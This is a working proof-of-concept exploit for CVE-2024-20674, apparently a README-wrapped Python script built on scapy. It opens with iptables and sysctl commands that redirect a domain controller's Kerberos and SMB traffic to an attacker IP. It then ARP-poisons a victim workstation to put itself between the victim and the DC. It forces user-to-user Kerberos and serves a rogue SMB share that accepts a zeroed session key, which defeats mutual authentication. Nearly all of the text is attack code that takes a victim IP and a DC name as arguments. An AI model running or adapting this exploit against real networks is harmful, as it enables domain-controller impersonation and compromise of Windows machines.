README.md
Rendering markdown...
"""
SMB server that bypasses Kerberos client mutual-auth validation.
CVE-2024-20674
```
sudo iptables -I OUTPUT -p icmp -m icmp --icmp-type host-unreachable -j DROP
sudo iptables -I OUTPUT -p icmp -m icmp --icmp-type port-unreachable -j DROP
sudo sysctl net.ipv4.conf.virbr1.forwarding=1
sudo sysctl net.ipv4.conf.all.send_redirects=0
sudo sysctl net.ipv4.conf.virbr1.send_redirects=0
sudo iptables -t nat -A PREROUTING -d <DCIP> -p tcp --dport 88 -j DNAT --to-destination <ATTACKERIP>
sudo iptables -t nat -A PREROUTING -d <DCIP> -p tcp --dport 445 -j DNAT --to-destination <ATTACKERIP>
```
"""
import os
import sys
import threading
import socket
from scapy.ansmachine import AnsweringMachineTCP
from scapy.arch import get_if_addr
from scapy.config import conf
from scapy.interfaces import resolve_iface
from scapy.layers.dns import dns_resolve
from scapy.layers.gssapi import (
GSS_S_CREDENTIALS_EXPIRED,
GSS_S_CONTINUE_NEEDED,
GSS_S_COMPLETE,
)
from scapy.layers.kerberos import *
from scapy.layers.l2 import arp_mitm, arpcachepoison, ARP_am, getmacbyip
from scapy.layers.smbserver import smbserver
from scapy.layers.spnego import SPNEGOSSP
from scapy.libs.rfc3961 import Key, EncryptionType
class KerberosBypass(KerberosSSP):
"""
A SMB server that triggers the U2U vulnerability
"""
def AcceptSecurityContext(self, Context, val=None):
if Context is None:
# New context
Context = self.CONTEXT()
if Context.state == self.STATE.INIT:
val.show()
try:
# GSSAPI/Kerberos
ap_req = val.root.innerContextToken.root
except AttributeError:
try:
# Raw Kerberos
ap_req = val.root
except AttributeError:
return None, GSS_S_DEFECTIVE_TOKEN
# The U2U case
if isinstance(ap_req, KRB_TGT_REQ):
# Build error to TGT-REQ
now_time = datetime.utcnow().replace(microsecond=0)
err = KRB_InitialContextToken(
MechType="1.2.840.113554.1.2.2.3", # U2U
innerContextToken=KRB5_InitialContextToken_PDU(
TOK_ID=b"\x03\x00",
root=KRB_ERROR(
errorCode="KRB_ERR_GENERIC",
stime=ASN1_GENERALIZED_TIME(now_time),
realm=ap_req.realm,
sname=PrincipalName(
nameString=[ASN1_GENERAL_STRING(x) for x in self.SPN.split("/")],
nameType=ASN1_INTEGER(2),
),
eData=KERB_ERROR_DATA(
dataType=1,
dataValue=struct.pack("<I", 0), # "SUCCESS" error
)
)
)
)
# Set the SessionKey to zeros
Context.SessionKey = b"\x00" * 16
# Return a fake success
return Context, err, GSS_S_COMPLETE
else:
# Not U2U: force ticket renewal via DC
now_time = datetime.utcnow().replace(microsecond=0)
err = KRB_ERROR(
errorCode="KRB_AP_ERR_TKT_NYV",
stime=ASN1_GENERALIZED_TIME(now_time),
realm=ap_req.ticket.realm,
sname=PrincipalName(
nameString=[ASN1_GENERAL_STRING(x) for x in self.SPN.split("/")],
nameType=ASN1_INTEGER(2),
),
)
return Context, err, GSS_S_CONTINUE_NEEDED
return super(KerberosBypass, self).AcceptSecurityContext(Context, val=val)
class KRB_TGSREQ_ANS(AnsweringMachineTCP):
"""
An answering machine that forces all TGS-REQ to require U2U
"""
filter = "tcp port 88"
def parse_options(self, DC_IP=None, port=88, cls=KerberosTCPHeader):
self.DC_IP = DC_IP
super(KRB_TGSREQ_ANS, self).parse_options(port=port, cls=cls)
def make_reply(self, req, address):
if isinstance(req.root, KRB_TGS_REQ) and req.root.reqBody.kdcOptions.val[28] != '1' and req.root.reqBody.sname.nameString[0].val.lower() == b"cifs":
# TGS-REQ that is not U2U
now_time = datetime.utcnow().replace(microsecond=0)
return KerberosTCPHeader()/Kerberos(
root=KRB_ERROR(
errorCode="KDC_ERR_MUST_USE_USER2USER",
stime=ASN1_GENERALIZED_TIME(now_time),
realm=req.root.reqBody.realm,
sname=req.root.reqBody.sname,
)
)
else:
# passthrough
s = socket.socket()
s.connect((self.DC_IP, self.port))
s.send(bytes(req))
res = s.recv(65535)
s.close()
return self.cls(res)
class SPNEGO_FORCE_KRB(SPNEGOSSP):
"""
Skip over SPNEGO by sending some special octets during Server Initialization, so that
"raw" Kerberos is used for auth (not SPNEGO/Kerberos)
"""
def NegTokenInit2(self):
"""
Server-Initiation of GSSAPI/SPNEGO.
See [MS-SPNG] sect 3.2.5.2
"""
Context = self.CONTEXT(
self.supported_ssps,
force_supported_mechtypes=self.force_supported_mechtypes,
)
# thanks https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
return Context, b"\x00\x01\x40"
if __name__ == "__main__":
# Debug
from scapy.compat import hex_bytes
from scapy.config import conf
from scapy.themes import DefaultTheme
conf.color_theme = DefaultTheme()
demopath = os.path.abspath(os.path.join(os.path.dirname(__file__), "demo"))
if not os.path.exists(demopath):
print("demo/ folder is not next to exploit.py !")
sys.exit(1)
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("IP", help="the victim IPv4 (Windows Workstation)")
parser.add_argument("DC", help="the DC DNS name (e.g. dc1.domain.local)")
parser.add_argument("--no-mitm", help="Do not launch MITM. You need to do it manually", action="store_true")
args = parser.parse_args()
# get the network interface
iface = resolve_iface(conf.route.route(args.IP)[0])
print("| Using interface", iface)
# get the DC IP
try:
DC_IP = dns_resolve(args.DC).rdata
except AttributeError:
print("Can't resolve DC name !")
sys.exit(1)
print("| Resolved the DC name to ", DC_IP)
if not args.no_mitm:
# start arp mitm of the DC <-> victim
print("+ Starting arp_mitm")
macvict = getmacbyip(args.IP)
arp_thread = threading.Thread(target=arp_mitm, args=[DC_IP, args.IP], kwargs={"mac2": macvict})
arp_thread.start()
arp_ans = threading.Thread(target=ARP_am(IP_addr=DC_IP, iface=iface))
arp_ans.start()
arpcachepoison(args.IP, (get_if_addr(iface), "aa:bb:cc:dd:ee:ff"), verbose=False, count=1, interval=0)
# start the Kerberos proxy
print("+ Starting Kerberos proxy")
krb_proxy_thread = threading.Thread(target=KRB_TGSREQ_ANS(), kwargs={"DC_IP": DC_IP, "iface": iface})
krb_proxy_thread.start()
# start SMB server
smbserver(
iface=iface,
debug=4,
# -- SMB config
root_path=demopath,
SHARES=[b"Scapy", b"Stuff", b"SYSVOL"],
LOCAL_IPS=[DC_IP],
# DOMAIN_REFERRALS=["\\DOMAIN", "\\domain.local"],
ssp=SPNEGO_FORCE_KRB([
KerberosBypass(
SPN="cifs/" + args.DC,
KEY=Key(
EncryptionType.AES256,
key=b"\x00" * 32
)
)
])
)